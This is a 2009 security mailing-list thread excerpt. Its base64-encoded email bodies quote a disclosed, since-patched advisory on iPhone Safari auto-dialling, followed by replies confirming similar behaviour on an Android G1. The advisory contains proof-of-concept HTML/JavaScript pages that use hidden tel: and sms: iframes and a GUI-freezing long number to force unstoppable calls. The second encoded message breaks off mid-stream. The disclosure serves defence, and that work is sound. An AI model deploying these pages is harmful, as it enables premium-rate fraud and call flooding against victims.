>> If Bill Gates had a nickel for every time Windows crashed... Oh wait, he 
>> does!


-- 
Collin R. Mulliner <collin@betaversion.net>
info/pgp: finger collin@betaversion.net
C gives you enough rope to hang yourself. C++ also gives you the tree 
object to tie it to.


From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 14:07
------OOQ6QVNMQ89GSPKM03TM81BMDDCI85
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

UGVyaGFwcyBub3QgZ2V0dGluZyB0byB0aGUgZGlhbGVyLCBidXQgaGF2aW5nIHRoZSBkaWFsZXIg
bGF1bmNoIGF1dG9tYXRpY2FsbHkganVzdCBmcm9tIHZpZXdpbmcgYW4gZW1haWw/CgpDb2xsaW4g
TXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOgoKPk1pa2UsDQo+DQo+anVz
dCBnZXR0aW5nIHRvIHRoZSBwaG9uZSBkaWFsZXIgaXMgbm90IGEgYnVnISBUaGF0IGlzIHdoYXQg
dGhlIHRlbDogDQo+cHJvdG9jb2wgaXMgZm9yLiBBbGwgbW9zdCBhbGwgbW9iaWxlIHBob25lcyBp
bXBsZW1lbnQgdGhpcywgZXZlcnkgdGltZSANCj55b3Ugb3BlbiBhIHRlbDogVVJMIHlvdSB3aWxs
IGdldCB0byB0aGUgZGlhbGVyIGluIHNvbWUgd2F5Lg0KPg0KPkNvbGxpbg0KPg0KPk1pa2UgRWx5
IHdyb3RlOg0KPj4gQ29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmlu
ZyBPUyB2ZXJzaW9uIDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24g
ZW1haWwgdG8gZGlhbCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQg
dGhlIHN1YmplY3QgbGluZSA7KQ0KPj4gDQo+PiBGV0lXLCBpdCBkaWRuJ3QgYWN0dWFsbHkgZGlh
bCwganVzdCBsb2FkZWQgdGhlIGRpYWxlciB3aXRoIHRoYXQgbnVtYmVyIHJlYWR5LiAgDQo+PiAN
Cj4+IExvb2tzIGxpa2UgdGhpcyBpcyBhIFdlYmtpdCBidWcsIG5vdCBTYWZhcmkuIA0KPj4gDQo+
PiBDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOg0KPj4gDQo+
Pj4gUmVsZWFzZWQgc2luY2UgQXBwbGUgcHVibGlzaGVkIHRoZSBpUGhvbmUgMy4wIHNlY3VyaXR5
IGZpeGVzLg0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBSZXBvcnQNCj4+Pg0KPj4+IC0tLSBCRUdJ
TiBBRFZJU09SWSAtLS0NCj4+Pg0KPj4+IE1hbnVmYWN0dXJlcjogQXBwbGUgKHd3dy5hcHBsZS5j
b20pDQo+Pj4gRGV2aWNlOiAgICAgICBpUGhvbmUgM0cgKGlQaG9uZSAxc3QgR2VuKQ0KPj4+IEZp
cm13YXJlOiAgICAgMi4xIChwb3NzaWJsZSBlYXJsaWVyIHZlcnNpb25zKQ0KPj4+IERldmljZSBU
eXBlOiAgc21hcnQgcGhvbmUNCj4+Pg0KPj4+IFN1YnN5c3RlbXM6IFNhZmFyaSAoYW5kIG1vYmls
ZSB0ZWxlcGhvbnkpDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+
DQo+Pj4gU2hvcnQgbmFtZToNCj4+PiAgIGlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsICh2
dWxuZXJhYmlsaXR5KQ0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBjbGFzczoNCj4+PiAgIGFwcGxp
Y2F0aW9uIGxvZ2ljIGJ1Zw0KPj4+DQo+Pj4gRXhlY3V0aXZlIFN1bW1hcnk6DQo+Pj4gICBBIG1h
bGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwgd2l0aG91dCB0aGUgbmVl
ZCBvZiB1c2VyDQo+Pj4gICBpbnRlcmFjdGlvbi4gVGhlIGRlc3RpbmF0aW9uIHBob25lIG51bWJl
ciBpcyBjaG9zZW4gYnkgdGhlIGF0dGFja2VyLg0KPj4+DQo+Pj4gUmlzazogTUVESVVNLUhJR0gN
Cj4+PiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBvZiBmaW5h
bmNpYWwgZ2FpbiB0aHJvdWdoDQo+Pj4gICB0aGlzIGF0dGFjayBieSBjYWxsaW5nIG9mIHByZW1p
dW0gcmF0ZSBudW1iZXJzIChlLmcuIDEtOTAwIGluIHRoZQ0KPj4+ICAgVS5TLikuIERlbmlhbC1v
Zi1zZXJ2aWNlIGFnYWluc3QgYXJiaXRyYXJ5IHBob25lIG51bWJlcnMgdGhyb3VnaA0KPj4+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4+Pg0KPj4+IC0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBSZXBvcnRlcjogQ29sbGluIE11bGxp
bmVyIDxjb2xsaW5bQVRdbXVsbGluZXIub3JnPg0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEFmZmlsaWF0aW9uOiBNVWxsaU5FUi5PUkcgLyB0aGUgdHJp
ZmluaXRlIGdyb3VwIC8gKEZyYXVuaG9mZXIgU0lUKQ0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IFRpbWUgbGluZToNCj4+Pg0KPj4+ICAgT2N0LiAyMC4g
MjAwODogUmVwb3J0ZWQgdnVsbmVyYWJpbGl0eSB0byB2ZW5kb3IuDQo+Pj4gICBPY3QuIDIwLiAy
MDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBvdXIgZW1haWwuDQo+Pj4gICAgICAg
ICAgICAgICAgICBOb3QgY29tbWVudGluZyBvbiB0aGUgdnVsbmVyYWJpbGl0eSBpdHNlbGYuDQo+
Pj4gICBPY3QuIDI3LiAyMDA4OiBTZW50IHVwZGF0ZSB0byB2ZW5kb3IsIGFsc28gcmVxdWVzdGlu
ZyBhIHN0YXR1cyByZXBvcnQuDQo+Pj4gICBPY3QuIDI5LiAyMDA4OiBSZXBseSBmcm9tIHZlbmRv
ciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPj4+ICAgT2N0LiAzMC4gMjAwODog
U2VudCBhZGRpdGlvbmFsIGluZm9ybWF0aW9uLg0KPj4+ICAgTm92LiAxMy4gMjAwODogVmVuZGVy
IHNheXMgdnVsbmVyYWJpbGl0eSBpcyBmaXhlZCBpbiB1cGNvbWluZyBPUw0KPj4+ICAgICAgICAg
ICAgICAgICAgdmVyc2lvbi4NCj4+PiAgIE5vdi4gMjAuIDIwMDg6IFB1YmxpYyBkaXNjbG9zdXJl
Lg0KPj4+ICAgSnVuLiAxOC4gMjAwOTogRnVsbC1EaXNjbG9zdXJlLg0KPj4+DQo+Pj4gLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEZpeDoNCj4+Pg0KPj4+ICAgaVBob25l
IE9TIDIuMg0KPj4+ICAgaVBob25lIE9TIDIuMi4xDQo+Pj4gICBpUGhvbmUgT1MgMy4wDQo+Pj4g
CQ0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBUZWNobmljYWwg
RGV0YWlsczoNCj4+Pg0KPj4+ICAgVGhlIFNhZmFyaSB2ZXJzaW9uIHJ1bm5pbmcgb24gdGhlIGlQ
aG9uZSBzdXBwb3J0cyBoYW5kbGluZyB0aGUgVEVMIFsxXQ0KPj4+ICAgcHJvdG9jb2wgdGhyb3Vn
aCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFsZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4+
PiAgIGRvbmUgYnkgcGFzc2luZyB0aGUgcHJvdmlkZWQgcGhvbmUgbnVtYmVyIHRvIHRoZSB0ZWxl
cGhvbnkNCj4+PiAgIGFwcGxpY2F0aW9uLiBVbmRlciBub3JtYWwgY29uZGl0aW9ucywgbG9hZGlu
ZyBhIHRlbDogVVJJIHJlc3VsdHMgaW4gYQ0KPj4+ICAgbWVzc2FnZSBib3ggYXNraW5nIHRoZSB1
c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBudW1iZXIuIFRoZQ0KPj4+ICAgdXNl
ciBpcyBwcmVzZW50ZWQgd2l0aCB0aGUgc2ltcGxlIGNob2ljZSB0byBlaXRoZXIgcHJlc3MgY2Fs
bCBvcg0KPj4+ICAgY2FuY2VsLg0KPj4+DQo+Pj4gICBBIFRFTCBVUkkgY2FuIGJlIG9wZW5lZCBh
dXRvbWF0aWNhbGx5IGlmIHRoZSBURUwgVVJJIGlzIHVzZWQgYXMgdGhlDQo+Pj4gICBzb3VyY2Ug
b2YgYW4gSFRNTCBpZnJhbWUgb3IgZnJhbWUsIGFzIHRoZSBVUkwgb2YgYSBtZXRhIHJlZnJlc2gs
IGFzDQo+Pj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwgYW5kIGFzIHRo
ZSBsb2NhdGlvbiBvZiB0aGUNCj4+PiAgIGN1cnJlbnQgb3IgYSBuZXcgd2luZG93IHVzaW5nIGph
dmFzY3JpcHQuDQo+Pj4NCj4+PiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJhYmls
aXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPj4+ICAgcGVybWlzc2lvbiB0byBjYWxs
IiBkaWFsb2cgaW4gYSB3YXkgdGhhdCBjaG9vc2VzIHRoZSAiY2FsbCIgb3B0aW9uDQo+Pj4gICBy
YXRoZXIgdGhhbiB0aGUgImNhbmNlbCIgb3B0aW9uLg0KPj4+IAkNCj4+PiAgIFRoaXMgY29uZGl0
aW9uIG9jY3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4+
PiAgIFNhZmFyaSBpcyBjbG9zZWQgYnkgbGF1bmNoaW5nIGFuIGV4dGVybmFsIGFwcGxpY2F0aW9u
LCBmb3IgZXhhbXBsZQ0KPj4+ICAgbGF1bmNoaW5nIHRoZSBTTVMgYXBwbGljYXRpb24gKGluIG9y
ZGVyIHRvIGhhbmRsZSBhIFNNUyBVUkkgWzJdKS4gVGhlDQo+Pj4gICBTTVMgYXBwbGljYXRpb24g
Y2FuIGJlIGxhdW5jaGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+Pj4gICBz
b3VyY2Ugb2YgYW4gaWZyYW1lLiBUaGlzIGlzIHNob3duIGluIHRoZSBmaXJzdCBwcm9vZi1vZi1j
b25jZXB0DQo+Pj4gICBleHBsb2l0IGJlbG93Lg0KPj4+IAkNCj4+PiAgIEZ1cnRoZXIgaW52ZXN0
aWdhdGlvbiBzaG93ZWQgdGhhdCB0aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+
Pj4gICBsYXVuY2hpbmcgb3RoZXIgYXBwbGljYXRpb25zIHN1Y2ggYXM6IE1hcHMsIFlvdVR1YmUs
IGFuZCBpVHVuZXMuDQo+Pj4gICBMYXVuY2hpbmcgdGhlc2UgYXBwbGljYXRpb25zIGNhbiBiZSBh
Y2hpZXZlZCB0aHJvdWdoIGxvYWRpbmcgc3BlY2lhbA0KPj4+ICAgVVJMcyB1c2luZyB0aGUgbWV0
YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93biBpbiB0aGUgc2Vjb25kDQo+Pj4gICBwcm9vZi1v
Zi1jb25jZXB0IGV4cGxvaXQgYmVsb3cuDQo+Pj4NCj4+PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0
aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVkIHRocm91Z2ggcG9wdXANCj4+PiAgIHdp
bmRvd3MgKGUuZy4gamF2YXNjcmlwdCBhbGVydCkuIEluIHRoaXMgc2l0dWF0aW9uIHRoZSBpbml0
aWF0aW5nIGFwcA0KPj4+ICAgZG9lcyBub3QgbmVlZCB0byBiZSB0ZXJtaWFudGVkIGluIG9yZGVy
IHRvIGFjdGl2ZSB0aGUgY2FsbC4NCj4+PiAJDQo+Pj4gICBGaW5hbGx5LCB3ZSBkaXNjb3ZlcmVk
IGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0NCj4+PiAgIG1hbGljaW91
cyBwaG9uZSBjYWxscyB0aGF0IGNhbm5vdCBiZSBwcmV2ZW50ZWQgb3IgY2FuY2VsZWQgYnkgdGhl
DQo+Pj4gICB2aWN0aW0uIFRoaXMgYnVnIGFsbG93cyB0aGUgYXR0YWNrZXIgdG8gZnJlZXogdGhl
IEdVSSAoZ3JhcGhpY2FsIHVzZXINCj4+PiAgIGludGVyZmFjZSkgZm9yIGEgbnVtYmVyIG9mIHNl
Y29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+Pj4gICBwcm9ncmVzc2Vz
IGluCXRoZSBiYWNrZ3JvdW5kIGFuZCBjYW5ub3QgYmUgc3RvcHBlZCBieSB0aGUgdmljdGltIHVz
ZXIuDQo+Pj4gICBGcmVlemluZyB0aGUgR1VJIGlzIGFjaGlldmVkIGJ5IHBhc3NpbmcgYSAidmVy
eSBsb25nIiBwaG9uZSBudW1iZXIgdG8NCj4+PiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRoZSBT
TVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+Pj4gICBzdGFydGVkLCBm
cmVlemVzIHRoZSBpUGhvbmUgR1VJLiBBbHNvIHN3aXRjaGluZyBvZmYgdGhlIGlQaG9uZSBjYW5u
b3QNCj4+PiAgIGJlIHBlcmZvcm1lZCBmYXN0IGVub3VnaCBpbiBvcmRlciB0byBwcmV2ZW50IHRo
ZSBtYWxpY2lvdXMgY2FsbC4NCj4+PiAJDQo+Pj4NCj4+PiAgIFsxXSBodHRwOi8vd3d3LnJmYy1l
ZGl0b3Iub3JnL3JmYy9yZmMzOTY2LnR4dA0KPj4+ICAgWzJdIGh0dHA6Ly90b29scy5pZXRmLm9y
Zy9odG1sL2RyYWZ0LWFudHRpLWdzbS1zbXMtdXJsLTA0DQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4gRnVydGhlciBEaXNjdXNzaW9uOg0KPj4+DQo+Pj4g
ICBUaGUgZGlhbGluZyBkaWFsb2cgaXMgY2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRo
ZSB1c2VyLCBpbiBtb3N0DQo+Pj4gICBjYXNlcywgY2FuJ3QgcHJlc3MgY2FuY2VsIHF1aWNrIGVu
b3VnaCBpbiBvcmRlciB0byBzdG9wIHRoZSBpbml0aWF0aW9uDQo+Pj4gICBvZiB0aGUgY2FsbC4g
T25jZSB0aGUgZXh0ZXJuYWwgYXBwbGljYXRpb24gaXMgbGF1bmNoZWQsIHRoZSB0ZWxlcGhvbnkN
Cj4+PiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcgaW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWlu
ZyB0aGUgY2FsbC4gT25seQ0KPj4+ICAgdGhlIGNhbGwgZm9yd2FyZGluZyBkaWFsb2cgKGNvbnRh
aW5pbmcgdGhlICJkaXNtaXNzIiBidXR0b24pIGluZGljYXRlcw0KPj4+ICAgYSBjYWxsIGJlaW5n
IG1hZGUuDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4g
UHJvb2Ytb2YtQ29uY2VwdCB3aXRoIHBsYWluIEhUTUwgdXNpbmcgdGhlIFNNUyBhcHBsaWNhdGlv
bjoNCj4+Pg0KPj4+ICAgPGh0bWw+DQo+Pj4gICA8aGVhZD4NCj4+PiAgIDx0aXRsZT5pUGhvbmUg
U2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29sbGluIE11bGxpbmVyDQo+
Pj4gICA8L3RpdGxlPg0KPj4+ICAgPC9oZWFkPg0KPj4+ICAgPGJvZHk+DQo+Pj4gICA8aWZyYW1l
IHNyYz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPj4+
ICAgPGlmcmFtZSBzcmM9InRlbDorMTQwODk3NDgzODgiIFdJRFRIPTUwIEhFSUdIVD0xMD48L2lm
cmFtZT4NCj4+PiAgIDwhLS0gc2Vjb25kIGlmcmFtZSBpcyB0byBhdHRhY2sgcXVpY2sgdXNlcnMg
d2hvIG1hbmFnZSB0byBjbG9zZSB0aGUNCj4+PiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8t
LT4NCj4+PiAgIDxpZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9
MTA+PC9pZnJhbWU+DQo+Pj4gICA8L2JvZHk+DQo+Pj4gICA8L2h0bWw+DQo+Pj4NCj4+PiBQcm9v
Zi1vZi1Db25jZXB0IHVzaW5nIGphdmFzY3JpcHQgYW5kIHRoZSBNYXBzIGFwcGxpY2F0aW9uOg0K
Pj4+DQo+Pj4gICA8aHRtbD4NCj4+PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZh
cmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAg
IDwvdGl0bGU+DQo+Pj4gICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOw0K
Pj4+ICAgVVJMPWh0dHA6Ly9tYXBzLmdvb2dsZS5kZS9tYXBzP3E9cmhlaW5zdHJhc3NlKzc1K2Rh
cm1zdGFkdCI+DQo+Pj4gICA8L2hlYWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFu
Zz1qYXZhc2NyaXB0Pg0KPj4+ICAgZnVuY3Rpb24gYSgpIHsNCj4+PiAgICBkb2N1bWVudC53cml0
ZSgiPGlmcmFtZSBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgV0lEVEg9NTAgDQo+Pj4gSEVJR0hU
PTEwPjwvaWZyYW1lPiIpOw0KPj4+ICAgfQ0KPj4+ICAgc2V0VGltZW91dCgiYSgpIiwgMTAwKTsN
Cj4+PiAgIDwvc2NyaXB0Pg0KPj4+ICAgPC9ib2R5Pg0KPj4+ICAgPC9odG1sPg0KPj4+IAkNCj4+
PiBQcm9vZi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0
b3AgdGhlIG1hbGljaW91cyANCj4+PiBwaG9uZSBjYWxsOg0KPj4+DQo+Pj4gICA8aHRtbD4NCj4+
PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4
cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAgIDwvdGl0bGU+DQo+Pj4gICA8L2hl
YWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFuZz1qYXZhc2NyaXB0Pg0KPj4+ICAg
bCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0KPj4+ICAgZm9yIChpID0gMDsgaSA8IDEwMDAwOyBp
KyspIHsNCj4+PiAgICAgICAgICAgbCA9IGwgKyAiMzM0MDk0ODAzNDI5ODIzMiI7DQo+Pj4gICB9
DQo+Pj4gICBsID0gbCArICJcIiB3aWR0aD0xMCBoZWlnaHQ9MTA+PC9pZnJhbWU+PGlmcmFtZQ0K
Pj4+ICAgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIGhlaWdodD0xMCB3aWR0aD0xMD48L2lmcmFt
ZT4iOw0KPj4+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+Pj4gICA8L3NjcmlwdD4NCj4+PiAgIDwv
Ym9keT4NCj4+PiAgIDwvaHRtbD4NCj4+Pg0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tDQo+Pj4NCj4+PiBNb3JlIERldGFpbGVkIEluZm9ybWF0aW9uOg0KPj4+DQo+Pj4gIERlbW8g
dmlkZW8gYXZhaWxhYmxlIGF0Og0KPj4+ICAgaHR0cDovL3d3dy5tdWxsaW5lci5vcmcvaXBob25l
Lw0KPj4+DQo+Pj4gIEFkdmlzb3JpZXM6DQo+Pj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9z
ZWN1cml0eS9hZHZpc29yaWVzLw0KPj4+DQo+Pj4gLS0tIEVORCBBRFZJU09SWSAtLS0NCj4+Pg0K
Pj4+DQo+Pj4gLS0gDQo+Pj4gQ29sbGluIFIuIE11bGxpbmVyIDxjb2xsaW5AYmV0YXZlcnNpb24u
bmV0Pg0KPj4+IGluZm8vcGdwOiBmaW5nZXIgY29sbGluQGJldGF2ZXJzaW9uLm5ldA0KPj4+IElm
IEJpbGwgR2F0ZXMgaGFkIGEgbmlja2VsIGZvciBldmVyeSB0aW1lIFdpbmRvd3MgY3Jhc2hlZC4u
LiBPaCB3YWl0LCBoZSANCj4+PiBkb2VzIQ0KPg0KPg0KPi0tIA0KPkNvbGxpbiBSLiBNdWxsaW5l
ciA8Y29sbGluQGJldGF2ZXJzaW9uLm5ldD4NCj5pbmZvL3BncDogZmluZ2VyIGNvbGxpbkBiZXRh
dmVyc2lvbi5uZXQNCj5DIGdpdmVzIHlvdSBlbm91Z2ggcm9wZSB0byBoYW5nIHlvdXJzZWxmLiBD
KysgYWxzbyBnaXZlcyB5b3UgdGhlIHRyZWUgDQo+b2JqZWN0IHRvIHRpZSBpdCB0by4NCg==

------OOQ6QVNMQ89GSPKM03TM81BMDDCI85--



From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 09:14
------OOQR8OIVASFMLRMIKQ9G04MAIHM98G
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

Q29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmluZyBPUyB2ZXJzaW9u
IDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24gZW1haWwgdG8gZGlh
bCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQgdGhlIHN1YmplY3Qg
bGluZSA7KQoKRldJVywgaXQgZGlkbid0IGFjdHVhbGx5IGRpYWwsIGp1c3QgbG9hZGVkIHRoZSBk
aWFsZXIgd2l0aCB0aGF0IG51bWJlciByZWFkeS4gIAoKTG9va3MgbGlrZSB0aGlzIGlzIGEgV2Vi
a2l0IGJ1Zywgbm90IFNhZmFyaS4gCgpDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lv
bi5uZXQ+IHdyb3RlOgoKPlJlbGVhc2VkIHNpbmNlIEFwcGxlIHB1Ymxpc2hlZCB0aGUgaVBob25l
IDMuMCBzZWN1cml0eSBmaXhlcy4NCj4NCj5WdWxuZXJhYmlsaXR5IFJlcG9ydA0KPg0KPi0tLSBC
RUdJTiBBRFZJU09SWSAtLS0NCj4NCj5NYW51ZmFjdHVyZXI6IEFwcGxlICh3d3cuYXBwbGUuY29t
KQ0KPkRldmljZTogICAgICAgaVBob25lIDNHIChpUGhvbmUgMXN0IEdlbikNCj5GaXJtd2FyZTog
ICAgIDIuMSAocG9zc2libGUgZWFybGllciB2ZXJzaW9ucykNCj5EZXZpY2UgVHlwZTogIHNtYXJ0
IHBob25lDQo+DQo+U3Vic3lzdGVtczogU2FmYXJpIChhbmQgbW9iaWxlIHRlbGVwaG9ueSkNCj4N
Cj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlNob3J0IG5hbWU6DQo+ICAgaVBo
b25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgKHZ1bG5lcmFiaWxpdHkpDQo+DQo+VnVsbmVyYWJp
bGl0eSBjbGFzczoNCj4gICBhcHBsaWNhdGlvbiBsb2dpYyBidWcNCj4NCj5FeGVjdXRpdmUgU3Vt
bWFyeToNCj4gICBBIG1hbGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwg
d2l0aG91dCB0aGUgbmVlZCBvZiB1c2VyDQo+ICAgaW50ZXJhY3Rpb24uIFRoZSBkZXN0aW5hdGlv
biBwaG9uZSBudW1iZXIgaXMgY2hvc2VuIGJ5IHRoZSBhdHRhY2tlci4NCj4NCj5SaXNrOiBNRURJ
VU0tSElHSA0KPiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBv
ZiBmaW5hbmNpYWwgZ2FpbiB0aHJvdWdoDQo+ICAgdGhpcyBhdHRhY2sgYnkgY2FsbGluZyBvZiBw
cmVtaXVtIHJhdGUgbnVtYmVycyAoZS5nLiAxLTkwMCBpbiB0aGUNCj4gICBVLlMuKS4gRGVuaWFs
LW9mLXNlcnZpY2UgYWdhaW5zdCBhcmJpdHJhcnkgcGhvbmUgbnVtYmVycyB0aHJvdWdoDQo+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4NCj4tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlJlcG9ydGVyOiBDb2xsaW4gTXVsbGluZXIgPGNvbGxp
bltBVF1tdWxsaW5lci5vcmc+DQo+DQo+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4N
Cj5BZmZpbGlhdGlvbjogTVVsbGlORVIuT1JHIC8gdGhlIHRyaWZpbml0ZSBncm91cCAvIChGcmF1
bmhvZmVyIFNJVCkNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlRpbWUg
bGluZToNCj4NCj4gICBPY3QuIDIwLiAyMDA4OiBSZXBvcnRlZCB2dWxuZXJhYmlsaXR5IHRvIHZl
bmRvci4NCj4gICBPY3QuIDIwLiAyMDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBv
dXIgZW1haWwuDQo+ICAgICAgICAgICAgICAgICAgTm90IGNvbW1lbnRpbmcgb24gdGhlIHZ1bG5l
cmFiaWxpdHkgaXRzZWxmLg0KPiAgIE9jdC4gMjcuIDIwMDg6IFNlbnQgdXBkYXRlIHRvIHZlbmRv
ciwgYWxzbyByZXF1ZXN0aW5nIGEgc3RhdHVzIHJlcG9ydC4NCj4gICBPY3QuIDI5LiAyMDA4OiBS
ZXBseSBmcm9tIHZlbmRvciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPiAgIE9j
dC4gMzAuIDIwMDg6IFNlbnQgYWRkaXRpb25hbCBpbmZvcm1hdGlvbi4NCj4gICBOb3YuIDEzLiAy
MDA4OiBWZW5kZXIgc2F5cyB2dWxuZXJhYmlsaXR5IGlzIGZpeGVkIGluIHVwY29taW5nIE9TDQo+
ICAgICAgICAgICAgICAgICAgdmVyc2lvbi4NCj4gICBOb3YuIDIwLiAyMDA4OiBQdWJsaWMgZGlz
Y2xvc3VyZS4NCj4gICBKdW4uIDE4LiAyMDA5OiBGdWxsLURpc2Nsb3N1cmUuDQo+DQo+LS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5GaXg6DQo+DQo+ICAgaVBob25lIE9TIDIuMg0K
PiAgIGlQaG9uZSBPUyAyLjIuMQ0KPiAgIGlQaG9uZSBPUyAzLjANCj4JDQo+LS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5UZWNobmljYWwgRGV0YWlsczoNCj4NCj4gICBUaGUgU2Fm
YXJpIHZlcnNpb24gcnVubmluZyBvbiB0aGUgaVBob25lIHN1cHBvcnRzIGhhbmRsaW5nIHRoZSBU
RUwgWzFdDQo+ICAgcHJvdG9jb2wgdGhyb3VnaCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFs
ZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4gICBkb25lIGJ5IHBhc3NpbmcgdGhlIHByb3ZpZGVk
IHBob25lIG51bWJlciB0byB0aGUgdGVsZXBob255DQo+ICAgYXBwbGljYXRpb24uIFVuZGVyIG5v
cm1hbCBjb25kaXRpb25zLCBsb2FkaW5nIGEgdGVsOiBVUkkgcmVzdWx0cyBpbiBhDQo+ICAgbWVz
